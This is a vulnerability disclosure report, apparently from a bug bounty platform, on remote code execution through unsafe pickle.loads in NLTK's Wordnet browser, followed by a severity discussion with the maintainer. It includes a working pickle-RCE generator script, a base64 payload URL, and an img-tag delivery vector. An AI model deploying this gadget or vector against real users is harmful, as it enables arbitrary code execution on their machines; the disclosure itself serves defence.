RCE in Wordnet Browser in nltk/nltk
Reported on
Dec 29th 2022
Description
A user who visits a malicious link with wordnet browser open will execute code on system
Proof of Concept
Visit
http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu
The base64 is created from
import pickle
import sys
import base64
DEFAULT_COMMAND = "touch /tmp/PWNED"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print(base64.b64encode(pickle.dumps(PickleRce())))
After visiting link will create /tmp/PWNED on system.
ls /tmp
PWNED
This because nltk is unsafely using pickle.loads.
Impact
RCE by inducing user to visit a link.
Occurrences
wordnet_app.py L697
nltk is unsafely using pickle.loads here
Wordnet browser can be started by:
nltk.app.wordnet_app.app()
This vulnerability is concerning as a victim only needs to load a malicious img tag on their computer whilst their wordnet browser opened to execute malicious code.
In the previous report, I note that it is mentioned that the maintainer has never heard anyone using it but this Github issue thread https://github.com/nltk/nltk/issues/3002 proves otherwise and that means there are people still using wordnet browser which are vulnerable to RCE
Some guidance on how to fix this: https://docs.python.org/3.7/library/pickle.html#pickle.Unpickler.find_class
And https://docs.python.org/3.7/library/pickle.html#pickle-restrict
Just my 2 cents, I don't think that this should be low. I agree that the severity for the previous report https://huntr.dev/bounties/861a8d11-0fe9-4c2f-9112-af3a9559fa87/ should be set to low as the XSS is not really useful for an attacker (as there are no cookies for the application). But this is involving an RCE which can be triggered by just visiting any page online with a malicious <img> tag.
I think https://github.com/nltk/nltk/issues/3002 is evidence enough that people are indeed still using the Wordnet browser today. And, these people who are still using the wordnet browser should be concerned about this issue and upgrade their browser to prevent other people from executing malicious code on their systems. That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers. I would lean towards this being High due to the possible RCE impact (at minimum) with a big disclaimer that this only affects users of the wordnet browser.
But again, just my 2 cents.
^ Correction: I would lean towards this being High (at minimum) due to the possible RCE impact
That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers.
The critical error that I was referring to was the lack of parentheses in the line shown in https://github.com/nltk/nltk/issues/3002. This critical error would prevent the wordnet browser from working in normal circumstances, and would be detected by any user, not just concerned researchers like yourself. I stand by my belief that the wordnet browser is rarely used.
However, I'm not unreasonable. I am open to a discussion on what the severity of this report ought to be, and I recognize that there are differences between this report and the former. In particular:
- This vulnerability is much more severe.
- This report has the benefit of a compound-effect: I'm more included to notify users now that there have been two vulnerabilities in the wordnet browser.
I'm not very well aware of the img tag attack, could you elaborate on that?
I wasn't aware of that https://github.com/nltk/nltk/issues/3002 fixed quite a major bug. Apologies for that. In that case, I'd agree with you that the app is rarely used.
I'm not very well aware of the img tag attack, could you elaborate on that?
What I meant is that someone would only need to come across this HTML (in another tab of course) with the Wordnet browser opened in order for RCE to occur:
<img src="http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu">
In normal circumstances, I would think that is a critical/high vulnerability, given that the huntr's scope covers the entire repository and this is a documented API (just not widely used). But as you've mentioned, this module may be rarely used.
I do think there is a possibility of future impact, where users might stumble upon wordnet_app and start to use it, as mentioned in the Github issue. Taking this into account, I think medium would be fine for this vulnerability. Do you agree?
Alternatively, we can also go with High and point out that only the rarely used wordnet app is affected as @psmoros pointed out in the other thread.
@psmoros it may be better to provide maintainers with the ability to set an "environment" score which reflects how many users would be affected by usage of an API and adjust the score based on that -- sort of like what Hackerone does
I've discussed it with the team, and we have decided to remove the Wordnet Browser from NLTK (and move it to https://github.com/nltk/nltk_contrib/). As a result, I don't deem it necessary to push out a CVE notifying users to update to a new version, as there will only be one version with the fixes (3.8.1) before we remove the functionality altogether. After some consideration I've decided to leave the severity at the level that you suggested, and I'll leave the final judgement for the CVE to Huntr.
I apologize for the consequences for your credibility and disclosure bounty from the reduction in severity. I appreciate the time and effort that you put into this report.
cc: @admin